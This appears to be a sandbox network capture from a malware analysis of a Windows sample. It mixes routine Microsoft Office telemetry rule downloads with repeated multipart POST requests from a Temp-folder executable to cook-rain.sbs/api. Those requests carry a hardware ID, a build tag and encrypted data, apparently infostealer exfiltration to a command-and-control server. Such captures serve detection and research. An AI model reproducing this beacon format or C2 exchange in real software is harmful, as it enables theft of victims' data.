                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:36 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=DWI14PY9H
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                            Content-Length: 18115
                                                                                                                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:36 UTC15331OUTData Raw: 2d 2d 44 57 49 31 34 50 59 39 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 31 42 39 43 46 37 31 41 31 38 31 43 31 37 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 44 57 49 31 34 50 59 39 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 57 49 31 34 50 59 39 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 44 57 49 31 34 50 59 39 48 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                                                                                                                                            Data Ascii: --DWI14PY9HContent-Disposition: form-data; name="hwid"391B9CF71A181C1763CFCF7E6C45F838--DWI14PY9HContent-Disposition: form-data; name="pid"2--DWI14PY9HContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--DWI14PY9HConten
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:36 UTC2784OUTData Raw: 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16 4d 6d b7 df b2 9f ab 08 69 99 b1 aa c5 3d ae 79 aa d5 a8 00 8f 1d 07 3c 68 bb 84 bf 22 32 72 5f 3f ee
                                                                                                                                                                                                                                                                                                            Data Ascii: 0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?lMmi=y<h"2r_?
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:37 UTC984INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:37 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=qllfe8srrrgrvejo6fkqqo3tro; expires=Mon, 17-Mar-2025 04:57:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rIXLPeODcX%2BiyUFpwQkOxqdREFvEaTELa9N20TtkBh0jLU65c0DfOGcpCTz4UwA5CQcQKLt6bLgiFvHpZTC2xszy1K4tZ4uP2Dn2gCmA71J%2FcaK5an%2FKk0gvlaiDbC3F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                                            CF-RAY: 8e603bf7ff06438b-EWR
                                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2042&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2829&recv_bytes=19065&delivery_rate=1433480&cwnd=169&unsent_bytes=0&cid=ba5eddb34844dd60&ts=890&x=0"
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:37 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            89192.168.2.44983013.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:36 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:36 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: c1a1f15b-901e-005b-358c-3a2005000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111036Z-178bfbc474bfw4gbhC1NYCunf400000001d0000000006yrs
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:37 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            90192.168.2.44983213.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:36 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:36 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: dd6cf878-401e-0067-68b9-3b09c2000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111036Z-r1d97b9957789nh9hC1TEBxha80000000ae00000000059uw
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:37 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            91192.168.2.44983413.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:38 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:38 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:38 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 8d0ecd0b-301e-0020-617e-3b6299000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111038Z-1777c6cb754mqztshC1TEB4mkc0000000b3000000000501g
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:38 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            92192.168.2.44983513.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:38 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:38 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 87533e62-501e-008f-028c-3a9054000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111038Z-1777c6cb754rz2pghC1TEBghen0000000au000000000dq6q
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:38 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            93192.168.2.44983613.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:38 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:39 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: b9d90d28-901e-00a0-5d63-3b6a6d000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111039Z-178bfbc474bxkclvhC1NYC69g400000001c00000000049au
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:39 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            94192.168.2.449839188.114.96.34437968C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:38 UTC269OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=U7YMTJ6VD
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                            Content-Length: 8736
                                                                                                                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:38 UTC8736OUTData Raw: 2d 2d 55 37 59 4d 54 4a 36 56 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 31 42 39 43 46 37 31 41 31 38 31 43 31 37 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 55 37 59 4d 54 4a 36 56 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 37 59 4d 54 4a 36 56 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 55 37 59 4d 54 4a 36 56 44 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                                                                                                                                            Data Ascii: --U7YMTJ6VDContent-Disposition: form-data; name="hwid"391B9CF71A181C1763CFCF7E6C45F838--U7YMTJ6VDContent-Disposition: form-data; name="pid"2--U7YMTJ6VDContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--U7YMTJ6VDConten
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:39 UTC987INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:39 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=du2o9bmjtvjuhb76ppc1o65ns0; expires=Mon, 17-Mar-2025 04:57:18 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FuEBYIOWeCsY%2FvsSRFwQ7g%2B2Dgy0PAC6dfCgiKkA7cAA16DzmKI%2BofGqfI%2BcyCA3FOx1XVokYwgOysqC45FT7D616OnOOtPAvRAEKIHzMhdxD4jilxh1z2JQwUaPRR4E"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                                            CF-RAY: 8e603c06bdd542cc-EWR
                                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1689&sent=10&recv=15&lost=0&retrans=0&sent_bytes=2829&recv_bytes=9663&delivery_rate=1690793&cwnd=166&unsent_bytes=0&cid=7ba9d2a1bac788dc&ts=921&x=0"
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:39 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            95192.168.2.44983713.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:39 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:39 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:39 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: fa1269cf-b01e-003d-7592-3bd32c000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
